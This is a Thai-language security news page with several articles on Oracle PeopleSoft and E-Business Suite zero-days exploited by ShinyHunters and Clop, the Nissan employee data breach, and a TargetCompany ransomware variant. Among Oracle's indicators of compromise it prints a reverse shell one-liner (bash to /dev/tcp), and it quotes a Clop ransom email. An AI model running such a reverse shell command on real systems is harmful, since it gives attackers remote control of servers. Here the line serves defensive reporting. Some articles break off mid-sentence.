Nissan เปิดเผยเหตุการณ์ข้อมูลพนักงานรั่วไหล ซึ่งเชื่อมโยงกับการโจมตีผ่านช่องโหว่ Zero-day ของ Oracle

Nissan ออกประกาศแจ้งเตือนว่าบริษัทประสบเหตุการณ์ข้อมูลรั่วไหล ซึ่งส่งผลกระทบต่อพนักงานปัจจุบัน และอดีตพนักงาน หลังจากผู้ไม่หวังดีทางไซเบอร์ได้ใช้ประโยชน์จากช่องโหว่ของ Oracle PeopleSoft ในการโจมตีเพื่อขโมยข้อมูล ซึ่งก่อนหน้านี้พบว่ามีความเชื่อมโยงกับกลุ่มแฮ็กเกอร์ ShinyHunters

ในเอกสารแจ้งเหตุการณ์ข้อมูลรั่วไหลที่ Nissan ยื่นต่อสำนักงานอัยการรัฐแคลิฟอร์เนีย มีการระบุ (โดยอ้างอิงข้อมูลจาก Oracle) ว่า การโจมตีเพื่อขโมยข้อมูลเหล่านี้ส่งผลกระทบต่อบริษัทหลายร้อยแห่ง และ Nissan ตกเป็นเป้าหมายในแคมเปญการโจมตีครั้งนี้

"Nissan Americas ใช้ซอฟต์แวร์ Oracle PeopleSoft ในการจัดการข้อมูลพนักงาน ซึ่งรวมถึงบัญชีเงินเดือน, การจัดการด้านภาษี และบันทึกข้อมูลบุคลากรอื่น ๆ"

"Oracle ได้แจ้งให้เราทราบว่ามีเหตุการณ์ทางไซเบอร์เกิดขึ้น และบันทึกข้อมูลบุคลากรของบริษัทหลายร้อยแห่งอาจถูกดึงไปโดยกลุ่มผู้ไม่หวังดีทางไซเบอร์ ซึ่งต่อมาเราได้ทราบว่า Nissan ตกเป็นเป้าหมายในการโจมตีครั้งนี้ด้วย"

Nissan ระบุว่า ขณะนี้การสืบสวนยังคงอยู่ในช่วงเริ่มต้น และยังไม่สามารถระบุผลกระทบทั้งหมดจากเหตุการณ์ข้อมูลรั่วไหลได้ แต่เชื่อว่าผู้โจมตีได้เข้าถึงข้อมูลส่วนบุคคล ซึ่งอาจรวมถึง ข้อมูลการติดต่อของพนักงาน, ข้อมูลทางธนาคาร, หมายเลขประกันสังคม, หมายเลขประกันภัยสังคม, หมายเลขประจำตัวประชาชน, ข้อมูลทางการเงินและภาษี ตลอดจนข้อมูลของผู้ที่อยู่ในความอุปการะ และผู้รับผลประโยชน์

เชื่อว่าเหตุการณ์นี้ส่งผลกระทบต่อพนักงานปัจจุบัน และอดีตพนักงานของ Nissan ในสหรัฐอเมริกา, แคนาดา, เม็กซิโก และบราซิล

Nissan ระบุว่า บริษัทได้เริ่มใช้มาตรการตอบสนองต่อเหตุการณ์ทันทีหลังจากทราบว่าประสบเหตุการณ์ข้อมูลรั่วไหล โดยได้ว่าจ้างผู้เชี่ยวชาญด้านความปลอดภัยทางไซเบอร์จากภายนอก รักษาความปลอดภัยให้กับระบบที่ได้รับผลกระทบ และกำลังทำงานร่วมกับ Oracle เพื่อแก้ไขปัญหาดังกล่าว

บริษัทยังระบุด้วยว่าได้ดำเนินการเพื่อยุติการเข้าถึงที่ไม่ได้รับอนุญาต และป้องกันไม่ให้ข้อมูลของพนักงานถูกเปิดเผยไปมากกว่านี้ อีกทั้งจะเสนอบริการตรวจสอบเครดิต และตรวจสอบ Dark web ให้กับบุคคลที่ได้รับผลกระทบโดยไม่เสียค่าใช้จ่าย

เพื่อเป็นมาตรการป้องกันเพิ่มเติม Nissan ระบุว่า บริษัทกำลังจำกัดการเข้าถึงสลิปเงินเดือนของพนักงาน และการเปลี่ยนแปลงการโอนเงินเข้าบัญชีโดยตรง ให้สามารถทำได้เฉพาะบนคอมพิวเตอร์ในเครือข่ายของบริษัท หรือผ่านการเชื่อมต่อ VPN ที่ปลอดภัยเท่านั้น ในระหว่างที่กำลังดำเนินการเพิ่มมาตรการการยืนยันตัวตนก่อนที่จะประมวลผลคำขอต่าง ๆ ที่เกี่ยวข้องกับบัญชีเงินเดือน

ทางผู้ผลิตรถยนต์ระบุว่า พนักงานที่ได้รับการยืนยันในท้ายที่สุดว่าข้อมูลถูกเปิดเผย จะได้รับการแจ้งเตือนเพิ่มเติมซึ่งระบุรายละเอียดว่ามีข้อมูลใดบ้างที่ได้รับผลกระทบ

ความเชื่อมโยงกับการโจมตีผ่านช่องโหว่ Zero-day บน PeopleSoft โดยกลุ่ม ShinyHunters

เชื่อว่าการเปิดเผยข้อมูลเหตุการณ์นี้เป็นผลมาจากการลักลอบโจมตีเซิร์ฟเวอร์ Oracle PeopleSoft เป็นวงกว้าง ซึ่งรายงานเป็นครั้งแรกโดย BleepingComputer เมื่อต้นเดือนที่ผ่านมา

ตามที่มีการรายงานในครั้งแรก ผู้ไม่หวังดีทางไซเบอร์ได้ใช้ประโยชน์จากช่องโหว่ Zero-day ใน Oracle PeopleSoft เพื่อเจาะเข้าระบบ และขโมยข้อมูล

กลุ่ม ShinyHunters ได้ออกมาอ้างความรับผิดชอบต่อการโจมตีดังกล่าว โดยให้ข้อมูลกับ BleepingComputer ว่า มี Instances ของระบบ PeopleSoft มากกว่า 300 รายการใน 100 องค์กรที่ถูกเจาะระบบ

หลังจากนั้นไม่นาน Oracle ได้เปิดเผยถึงช่องโหว่ระดับ Critical ใน Oracle PeopleSoft PeopleTools หมายเลข CVE-2026-35273 และได้ปล่อยมาตรการลดผลกระทบฉบับฉุกเฉินออกมาแล้ว

แม้ว่า Oracle จะยังไม่ได้ออกมายืนยันต่อสาธารณะว่ามีการโจมตีโดยใช้ช่องโหว่ดังกล่าว แต่ในเวลาต่อมา Mandiant ได้ยืนยันว่า ผู้ไม่หวังดีได้ใช้ช่องโหว่ CVE-2026-35273 ของ Oracle PeopleSoft ในฐานะช่องโหว่ Zero-day เพื่อทำการโจมตี และขโมยข้อมูลระหว่างวันที่ 27 พฤษภาคม ถึง 9 มิถุนายน ที่ผ่านมา

การโจมตีเหล่านี้ส่งผลกระทบต่อองค์กรในภาคการศึกษาเป็นหลัก โดย Mandiant ระบุว่า ได้ทำการแจ้งเตือนองค์กรต่าง ๆ ไปแล้วกว่า 100 แห่ง ซึ่งเป็นการยืนยันข้อมูลที่ ShinyHunters เคยเปิดเผยออกมาก่อนหน้านี้

ตั้งแต่นั้นเป็นต้นมา ShinyHunters ก็ได้เริ่มนำข้อมูลที่ขโมยมาจากการโจมตีเหล่านี้ไปเผยแพร่บนเว็บไซต์ Data leak ของตน ซึ่งรวมถึงข้อมูลของ Nottingham University และ National Association of Insurance Commissioners (NAIC) ของสหรัฐฯ

ผู้ไม่หวังดีกลุ่มนี้เป็นกลุ่มแฮ็กเกอร์ที่เป็นที่รู้จักกันดี ซึ่งมักจะมุ่งเป้าการโจมตีไปที่ Salesforce, Snowflake, Third-party ที่ให้บริการเชื่อมต่อระบบภายนอก และ Cloud SaaS environments อื่น ๆ เพื่อทำการขโมยข้อมูล

เมื่อเร็ว ๆ นี้ ShinyHunters เพิ่งมุ่งเป้าการโจมตีไปที่ภาคการศึกษาในการโจมตีทางไซเบอร์ที่แยกต่างหากอีกเหตุการณ์หนึ่งซึ่งเกิดขึ้นกับ Instructure Canvas โดยได้ขโมยข้อมูลจำนวนกว่า 280 ล้านรายการของนักเรียน, ครู และบุคลากร ซึ่งในเวลาต่อมา Instructure ต้องยอมจ่ายค่าไถ่เพื่อป้องกันไม่ให้ข้อมูลดังกล่าวถูกนำไปเปิดเผย

ที่มา : bleepingcomputer.

แฮ็กเกอร์เริ่มใช้ช่องโหว่ระดับ Critical ของ Oracle E-Business ในการโจมตีแล้ว

ผู้โจมตีเริ่มใช้ช่องโหว่ระดับ Critical (CVE-2026-46817) มาใช้โจมตีระบบ Oracle E-Business Suite (EBS) Financial Application แล้ว จากข้อมูลของ Defused บริษัทด้าน Threat Intelligence (more…)

NAIC เผย ข้อมูลที่ ShinyHunters ขโมยจากเหตุเจาะระบบ PeopleSoft เป็นข้อมูลที่เปิดเผยต่อสาธารณะอยู่แล้ว

สมาคมผู้กำกับดูแลธุรกิจประกันภัยแห่งชาติสหรัฐฯ (NAIC) เปิดเผยว่า กลุ่มเรียกค่าไถ่ ShinyHunters ขโมยข้อมูลที่เปิดเผยต่อสาธารณะ, Log เก่า และไฟล์ Configuration เท่านั้น หลังใช้ช่องโหว่ Zero-day เจาะระบบ Oracle PeopleSoft Server (more…)

กลุ่ม ShinyHunters แฮ็กเซิร์ฟเวอร์ Oracle PeopleSoft เพื่อขโมยข้อมูล

เซิร์ฟเวอร์ Oracle PeopleSoft กำลังตกเป็นเป้าหมายของการโจมตีเพื่อขโมยข้อมูลอย่างต่อเนื่องโดยกลุ่ม ShinyHunters ซึ่งอ้างว่าได้ทำการขโมยข้อมูลจากองค์กรต่าง ๆ ไปแล้วกว่า 100 แห่ง (more…)

Oracle เร่งออกแพตช์ฉุกเฉินเพื่อแก้ไขช่องโหว่ระดับ Critical ใน Identity Manager

Oracle ออกแพตช์อัปเดตความปลอดภัยนอกรอบเพื่อแก้ไขช่องโหว่ระดับ Critical ที่ทำให้มีการการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกลโดยไม่ได้รับอนุญาตในระบบ Identity Manager และ Web Services Manager ซึ่งมีหมายเลข CVE-2026-21992 (more…)

Oracle ออกแพตช์แก้ไขช่องโหว่ Zero-day ในระบบ EBS ที่ถูกกลุ่ม Clop ใช้โจมตีเพื่อขโมยข้อมูล

Oracle ออกคำเตือนเกี่ยวกับช่องโหว่ Zero-day ระดับ critical ในระบบ E-Business Suite ซึ่งมีหมายเลข CVE-2025-61882 โดยช่องโหว่นี้ทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน และช่องโหว่นี้กำลังถูกนำไปใช้จริงในการโจมตีเพื่อขโมยข้อมูลจากกลุ่ม Clop

ช่องโหว่นี้อยู่ในผลิตภัณฑ์ Oracle Concurrent Processing ของ Oracle E-Business Suite (component: BI Publisher Integration) และมีคะแนน CVSS 9.8 เนื่องจากไม่ต้องผ่านการยืนยันตัวตน และสามารถถูกโจมตีได้ง่าย

ตามที่ Oracle ระบุไว้ในเอกสารคำแนะนำฉบับใหม่ว่า “การแจ้งเตือนด้านความปลอดภัยฉบับนี้มีขึ้นเพื่อจัดการกับช่องโหว่ CVE-2025-61882 ในระบบ Oracle E-Business Suite”

ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน โดยผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ผ่านเครือข่ายได้ โดยไม่จำเป็นต้องมีชื่อผู้ใช้ หรือรหัสผ่าน และหากการโจมตีสำเร็จ อาจส่งผลให้เกิดการรันโค้ดที่เป็นอันตรายจากระยะไกลได้

Oracle ยืนยันว่า ช่องโหว่แบบ zero-day ดังกล่าว ส่งผลกระทบต่อระบบ Oracle E-Business Suite เวอร์ชัน 12.2.3 ถึง 12.2.14 และได้ออกแพตซ์อัปเดตฉุกเฉิน (emergency update) เพื่อแก้ไขช่องโหว่นี้แล้ว

บริษัทระบุว่า ลูกค้าจะต้องติดตั้ง Critical Patch Update ประจำเดือนตุลาคม 2023 ก่อน จึงจะสามารถติดตั้งแพตซ์อัปเดตความปลอดภัยชุดใหม่ได้

เนื่องจากมีการเปิดเผย PoC exploit ออกมาแล้ว และช่องโหว่นี้กำลังถูกใช้ในการโจมตีจริง จึงจำเป็นที่ผู้ดูแลระบบ Oracle จะต้องติดตั้งอัปเดตความปลอดภัยโดยเร็วที่สุด

ช่องโหว่ zero-day ดังกล่าวถูกนำไปใช้ในการโจมตีเพื่อขโมยข้อมูลโดยกลุ่ม Clop

แม้ว่า Oracle จะไม่ได้ระบุอย่างชัดเจนว่าช่องโหว่นี้เป็น zero-day แต่บริษัทได้เปิดเผย Indicators of Compromise (IoCs) ซึ่งสอดคล้องกับโค้ดการโจมตีใน Oracle EBS ที่กลุ่มผู้โจมตีแชร์กันเมื่อไม่นานมานี้บน Telegram

Charles Carmakal ประธานเจ้าหน้าที่ฝ่ายเทคนิค (CTO) ของ Mandiant – Google Cloud ยืนยันว่าช่องโหว่ CVE-2025-61882 และช่องโหว่อื่น ๆ ที่ Oracle แก้ไขไปเมื่อเดือนกรกฎาคมนั้น ถูกกลุ่มแรนซัมแวร์ Clop นำไปใช้โจมตี และขโมยข้อมูลจากเซิร์ฟเวอร์ Oracle E-Business Suite ในเหตุการณ์การขโมยข้อมูลเมื่อเดือนสิงหาคม 2025

Carmakal ระบุผ่าน LinkedIn ว่า “กลุ่ม Clop ได้ใช้ช่องโหว่หลายรายการใน Oracle EBS เพื่อขโมยข้อมูลจำนวนมากจากเหยื่อหลายรายในเดือนสิงหาคม 2025”

Carmakal ระบุเพิ่มเติมว่า มีการใช้ช่องโหว่หลายรายการในการโจมตี รวมถึงช่องโหว่ที่ถูกแพตช์ไปแล้วในการอัปเดตของ Oracle เมื่อเดือนกรกฎาคม 2025 และช่องโหว่ที่เพิ่งถูกแก้ไขไปเมื่อสุดสัปดาห์ที่ผ่านมา (CVE-2025-61882)

ข่าวเกี่ยวกับแคมเปญการโจมตีครั้งล่าสุดของกลุ่ม Clop ถูกเผยแพร่ครั้งแรกเมื่อสัปดาห์ที่แล้ว เมื่อทีม Mandiant และ Google Threat Intelligence Group (GTIG) รายงานว่ากำลังติดตามแคมเปญใหม่ที่มีหลายบริษัทได้รับอีเมลซึ่งอ้างว่ามาจากกลุ่มผู้โจมตี

อีเมลเหล่านั้นระบุว่ากลุ่ม Clop ได้ขโมยข้อมูลจากระบบ Oracle E-Business Suite ของบริษัท และกำลังเรียกค่าไถ่เพื่อไม่ให้ข้อมูลที่ขโมยไปถูกนำออกไปเผยแพร่สู่สาธารณะ

เนื้อหาในอีเมลที่ถูกเรียกค่าไถ่ที่มีการแชร์ให้กับ BleepingComputer ระบุว่า "พวกเรา CL0P team หากคุณยังไม่เคยได้ยินข้อมูลเกี่ยวกับเรา คุณสามารถค้นหาข้อมูลเกี่ยวกับเราได้ทาง Google บนอินเทอร์เน็ต"

“เราเพิ่งโจมตีไปที่ระบบ Oracle E-Business Suite ของคุณได้สำเร็จ และได้ Copy เอกสารจำนวนมากออกมา ตอนนี้ไฟล์ส่วนตัวทั้งหมด และข้อมูลอื่น ๆ ของคุณถูกเก็บอยู่ในระบบของเราแล้ว”

กลุ่ม Clop มีประวัติยาวนานในการใช้ประโยชน์จากช่องโหว่แบบ zero-day ทำการโจมตีเพื่อขโมยข้อมูลครั้งใหญ่หลายครั้งในช่วงหลายปีที่ผ่านมา อาทิเช่น

ปี 2020: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม Accellion FTA ส่งผลกระทบกับบริษัทเกือบ 100 องค์กร
ปี 2021: ใช้ช่องโหว่แบบ zero-day ในซอฟต์แวร์ SolarWinds Serv-U FTP
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม GoAnywhere MFT โจมตีบริษัทมากกว่า 100 องค์กร
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในระบบ MOVEit Transfer ซึ่งถือเป็นแคมเปญที่ใหญ่ที่สุดของกลุ่ม Clop จนถึงปัจจุบัน ทำให้สามารถขโมยข้อมูลจาก 2,773 องค์กรทั่วโลก
ปี 2024: ใช้ช่องโหว่ zero-day จำนวนสองรายการในระบบ Cleo file transfer (CVE-2024-50623 และ CVE-2024-55956) เพื่อขโมยข้อมูล และเรียกค่าไถจากบริษัทต่าง ๆ

ในเวลาต่อมากลุ่ม Clop ได้ยืนยันกับ BleepingComputer ว่า พวกเขาอยู่เบื้องหลังอีเมลเรียกค่าไถ่ และระบุว่าพวกเขาใช้ประโยชน์จากช่องโหว่ Oracle zero-day เพื่อขโมยข้อมูล

อย่างไรก็ตาม ในช่วงแรก Oracle ได้เชื่อมโยงแคมเปญการเรียกค่าไถ่ของกลุ่ม Clop เข้ากับช่องโหว่ที่ถูกแพตช์ไปแล้วในเดือนกรกฎาคม 2025 แทนที่จะเป็นช่องโหว่ zero-day ตัวใหม่ ที่ภายหลังถูกยืนยันว่าเป็นช่องโหว่ที่ใช้ในการโจมตีครั้งนี้

Oracle ได้เปิดเผย IoCs สำหรับการโจมตีจากช่องโหว่ zero-day ซึ่งมี 2 IP addresses ที่พบว่าถูกใช้ในการโจมตีเซิร์ฟเวอร์ และคำสั่งที่ใช้เปิด remote shell รวมไปถึง exploit archive และไฟล์ที่เกี่ยวข้องในการโจมตี ดังนี้

200[.]107[.]207[.]26 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
185[.]181[.]60[.]11 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - คำสั่งที่เรียกใช้งาน reverse shell
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d - oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.

Oracle ปฏิเสธการถูกโจมตี หลัง Hacker อ้างว่าได้ขโมยข้อมูลออกไปกว่า 6 ล้านรายการ

Oracle ออกมาปฏิเสธว่าไม่ได้ถูกโจมตีระบบ หลังจากที่ Hacker อ้างว่าสามารถขโมยข้อมูลจาก SSO login servers ของ Oracle Cloud กว่า 6 ล้านรายการ

Oracle ให้ข้อมูลกับ BleepingComputer ว่า ไม่มีการโจมตีเกิดขึ้นกับ Oracle Cloud ข้อมูลที่ถูกเผยแพร่นั้นไม่ใช่ข้อมูลของ Oracle Cloud รวมถึงลูกค้าของ Oracle Cloud ไม่มีรายใดที่พบการโจมตี หรือสูญเสียข้อมูลใด ๆ

การปฏิเสธนี้ออกมาหลังจากที่ Hacker ในชื่อ rose87168 เปิดเผยข้อมูล text file จำนวนมากในวันที่ 20 มีนาคม 2025 โดยประกอบไปด้วยตัวอย่างข้อมูลในฐานข้อมูล, ข้อมูล LDAP และรายชื่อบริษัทที่ขโมยไปจาก SSO platform ของ Oracle Clouds

รวมถึง Hacker ได้แสดงหลักฐานว่าสามารถเข้าถึง Oracle Cloud servers ได้ โดยแสดง URL ของ Internet Archive ซึ่งระบุว่าได้อัปโหลดไฟล์ .txt ที่มีที่อยู่อีเมล ProtonMail ไปยัง login.

CISA แจ้งเตือนการพบช่องโหว่ด้านความปลอดภัย 2 รายการในผลิตภัณฑ์ของ Adobe และ Oracle ที่กำลังถูกนำไปใช้ในการโจมตีจริง

CISA ของสหรัฐฯ ได้เพิ่มช่องโหว่ด้านความปลอดภัย 2 รายการที่ส่งผลกระทบต่อ Adobe ColdFusion และ Oracle Agile Product Lifecycle Management (PLM) เข้าสู่รายการช่องโหว่ที่กำลังถูกนำไปใช้ในการโจมตีจริง (KEV) โดยอ้างอิงจากหลักฐานการถูกโจมตีจริง (more…)

Oracle ออก Patch Update ประจำเดือนมกราคม 2025 เพื่อแก้ไขช่องโหว่ 318 รายการในผลิตภัณฑ์ และบริการต่าง ๆ

Oracle แนะนำให้ลูกค้าติดตั้ง Critical Patch Update (CPU) ประจำเดือนมกราคม 2025 เพื่อแก้ไขช่องโหว่ด้านความปลอดภัยใหม่จำนวน 318 รายการที่พบในผลิตภัณฑ์ และบริการต่าง ๆ ของบริษัท (more…)

“TargetCompany” ransomware เวอร์ชัน Linux มุ่งเป้าหมายการโจมตีไปยัง VMware ESXi

นักวิจัยพบ TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่ ที่กำลังกำหนดเป้าหมายการโจมตีไปที่ VMware ESXi environments โดยใช้ custom shell script เพื่อส่ง และเรียกใช้เพย์โหลดที่เป็นอันตราย

TargetCompany หรือในชื่อ Mallox, FARGO และ Tohnichi ซึ่งเริ่มพบการโจมตีมาตั้งแต่เดือนมิถุนายน 2021 โดยมีเป้าหมายการโจมตีไปยัง database (MySQL, Oracle, SQL Server) ขององค์กรส่วนใหญ่ในไต้หวัน เกาหลีใต้ ไทย และอินเดีย

ในเดือนกุมภาพันธ์ 2022 ทาง Avast บริษัทแอนตี้ไวรัส ได้เผยแพร่เครื่องมือถอดรหัส ransomware ฟรี ที่สามารถถอดรหัสเวอร์ชันต่าง ๆ ของ TargetCompany ได้ ซึ่งต่อมาในเดือนกันยายน 2022 กลุ่ม TargetCompany ransomware ได้กลับมาปฏิบัติการอีกครั้ง โดยมุ่งเป้าหมายการโจมตีไปที่ Microsoft SQL ที่มีช่องโหว่ และข่มขู่เหยื่อด้วยการเผยแพร่ข้อมูลที่ถูกขโมยออกมาผ่านทาง Telegram

TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่

Trend Micro บริษัทรักษาความปลอดภัยทางไซเบอร์รายงานว่า TargetCompany ransomware เวอร์ชัน Linux ตัวใหม่ สามารถตรวจสอบได้ว่ามีสิทธิ์ระดับผู้ดูแลระบบก่อนที่จะดำเนินการโจมตีหรือไม่

ในการดาวน์โหลด และการเรียกใช้งานเพย์โหลดของแรนซัมแวร์ Hacker จะใช้ custom shell script ที่สามารถขโมยข้อมูลไปเก็บไว้ยังเซิร์ฟเวอร์ที่อยู่คนละที่กันสองเซิร์ฟเวอร์ได้ เผื่อในกรณีที่เกิดปัญหาทางเทคนิคกับเครื่องเหยื่อ โดยเพย์โหลดจะตรวจสอบว่ากำลังทำงานในสภาพแวดล้อม VMware ESXi หรือไม่ โดยการรันคำสั่ง 'uname' และค้นหา 'vmkernel'

จากนั้น ไฟล์ “TargetInfo.